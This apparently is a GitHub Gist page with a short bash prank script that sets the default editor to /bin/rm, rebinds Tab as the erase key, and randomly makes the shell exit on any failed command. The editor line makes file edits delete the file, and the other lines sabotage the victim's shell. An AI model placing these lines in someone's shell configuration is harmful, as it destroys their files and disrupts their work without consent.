Skip to content

Instantly share code, notes, and snippets.

View REBELinBLUE's full-sized avatar

Stephen Ball REBELinBLUE

  • LendInvest
  • London
View GitHub Profile
#!/usr/bin/env bash
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
# Make Tab send the delete key.
tset -Qe $'\t';
# Randomly make the shell exit whenever a command has a non-zero exit status.
((RANDOM % 10)) || set -o errexit;